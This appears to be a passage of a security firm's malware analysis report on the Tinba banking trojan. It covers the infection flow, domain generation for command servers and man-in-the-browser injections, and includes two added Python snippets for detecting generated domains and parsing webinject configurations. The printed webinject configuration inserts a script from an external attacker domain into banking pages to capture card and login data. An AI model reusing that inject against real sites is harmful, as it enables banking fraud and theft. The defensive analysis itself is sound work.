Table of Contents ... 2
Table of Figures ... 2
THE THREAT ... 4
    Trojans ... 4
    Script Injections ... 4
SUMMARY OF THE ATTACK ... 4
MALWARE ANALYSIS DETAILS ... 6
    Dropper Infection ... 6
    Hooking System Functions ... 6
    Autorun Locations ... 7
    Deployment on Disk ... 7
    Hooking the Browsers and Lowering Security ... 8
    Rootkit ... 8
        Registry ... 9
        Files ... 9
    Communication with C&C ... 10
    Downloading the Webinject Configuration File from the C&C ... 11
    Posting Stolen Data to the Drop Zone ... 12
    The Configuration File ... 12
    Configuration File Structure ... 14
    Tinba C&C Panel ... 14
MAN IN THE BROWSER INJECTIONS ... 15
    Specially Crafted Online Banking Injections ... 15
    Generic VBV Grabber ... 16
    CC+VBV Grabber ... 17
        ATSEngine Panel ... 19
        Stolen Credentials ... 19
TINBA DETAILS AND DETECTION RATIO ... 19
    Anti-Virus Scanning Results ... 19
    About F5 Labs ... 22
[Attack summary diagram; labelled elements: User, Bank, Spam, Malware, Code Injection, Login Credentials, Drop Zone, Transfer, Botmaster]

The user receives spam email and gets infected with Tinba malware.

Tinba steals login credentials and injects malicious HTML/JavaScript code into the user's browser. The stolen information is sent to the C&C server.

The attacker uses the stolen information for various fraudulent activities such as performing transactions and selling/using stolen credit cards.
[Process Monitor capture; columns: Process Name, Process ID, Thread ID, Operation, Path, Detail]

[Process Monitor capture; columns: Process Name, Process ID, Operation, Path, Detail]

[Process Monitor capture; columns: Process Name, Process ID, Operation, Path, Detail]

[Process Monitor capture; columns: Process Name, Process ID, Operation, Path, Detail]
Registry
Files
Figure 5: The C:\Documents and Settings\Administrator\Application Data\557CEB7B\ folder as seen from IceSword.

The malware uses a hard-coded algorithm to generate pseudo-random domains to which it sends DNS queries. This gives the attackers the ability to stand up a new C&C server under one of those domains if an old one has been taken down by Internet authorities. This way, the malware can come back to life without the need to re-infect the bots with a new binary.
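The resilience mechanism described above leaves a detectable footprint: an infected host probing generated names produces bursts of NXDOMAIN answers for long, high-entropy labels. The following added example (not code from the report, and Tinba's actual generation algorithm is not reproduced here) scores constructed resolver log lines with a character-level heuristic and flags clients showing that pattern; the log format and thresholds are assumptions.

```python
import math
import re
from collections import Counter

# Constructed DNS resolver log lines (not from the report): "client_ip queried_name rcode".
SAMPLE_DNS_LOG = """\
10.0.0.12 www.example.com NOERROR
10.0.0.12 mail.example.com NOERROR
10.0.0.17 qzkxv7h2pmwtr.com NXDOMAIN
10.0.0.17 hj4wq9zxlrbtf.net NXDOMAIN
10.0.0.17 ymt3xqwzkrvbd.com NXDOMAIN
10.0.0.17 pkw8zqxvhtrmn.org NXDOMAIN
10.0.0.17 cdn.example.org NOERROR
"""
LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(NOERROR|NXDOMAIN)$")

def shannon_entropy(s: str) -> float:
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())

def second_level_label(fqdn: str) -> str:
    # Registrable label only; production code would consult the public suffix list.
    parts = fqdn.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]

def looks_generated(label: str) -> bool:
    """Long, high-entropy, vowel-poor labels are what a character-level DGA tends to emit."""
    if len(label) < 10:
        return False
    vowels = sum(ch in "aeiou" for ch in label)
    return shannon_entropy(label) > 3.2 and vowels / len(label) < 0.25

def flag_dga_clients(log_text: str, min_hits: int = 3) -> dict:
    """Map client_ip -> generated-looking names that resolved NXDOMAIN, for clients
    with at least min_hits such failures (the fallback-domain probing pattern)."""
    hits = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        client, fqdn, rcode = m.groups()
        if rcode == "NXDOMAIN" and looks_generated(second_level_label(fqdn)):
            hits.setdefault(client, []).append(fqdn)
    return {c: names for c, names in hits.items() if len(names) >= min_hits}
```

Dictionary-based generators defeat the entropy test, so in practice this heuristic is paired with NXDOMAIN rate baselining per client.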
set_url *book* GP
data_before
data_end
data_inject
<script> var myComputer = "%BOTID%"; </script>
<script src="https://omtorwa.com/vbvgr/src/x.js"></script>
data_end
data_after
</head>
data_end

set_url *pay* GP
data_before
data_end
data_inject
<script> var myComputer = "%BOTID%"; </script>
<script src="https://omtorwa.com/vbvgr/src/x.js"></script>
data_end
data_after
</head>
data_end
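Analysts triaging a recovered configuration mostly want the URL masks and the external script hosts each entry pulls in. This added example (not the report's code) parses the set_url / data_before / data_inject / data_after layout shown above and extracts those indicators; the sample configuration is constructed and the script host is a placeholder rather than the report's real domain.

```python
import re
# Constructed sample in the set_url / data_* format shown above; the script host is a placeholder.
SAMPLE_CONFIG = """\
set_url *book* GP
data_before
data_end
data_inject
<script> var myComputer = "%BOTID%"; </script>
<script src="https://injector.example/vbvgr/src/x.js"></script>
data_end
data_after
</head>
data_end
set_url *pay* GP
data_before
data_end
data_inject
<script src="https://injector.example/cc/grab.js"></script>
data_end
data_after
</head>
data_end
"""
SECTION_KEYS = ("data_before", "data_inject", "data_after")

def parse_webinjects(text: str) -> list:
    """One dict per set_url entry: url_mask, flags and the three data_* bodies."""
    injects, section, buf = [], None, []
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("set_url"):
            parts = line.split()
            injects.append({"url_mask": parts[1], "flags": parts[2] if len(parts) > 2 else "",
                            "data_before": "", "data_inject": "", "data_after": ""})
        elif line in SECTION_KEYS:
            section, buf = line, []          # start collecting a body
        elif line == "data_end" and section and injects:
            injects[-1][section] = "\n".join(buf)   # empty data_before: inject right before data_after
            section = None
        elif section is not None:
            buf.append(raw)
    return injects

def external_scripts(injects: list) -> set:
    """Every src= URL the injections pull in: the network IoCs a defender blocks or hunts for."""
    urls = set()
    for inj in injects:
        urls.update(re.findall(r'src="([^"]+)"', inj["data_inject"]))
    return urls
```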
ATSEngine Panel
Stolen Credentials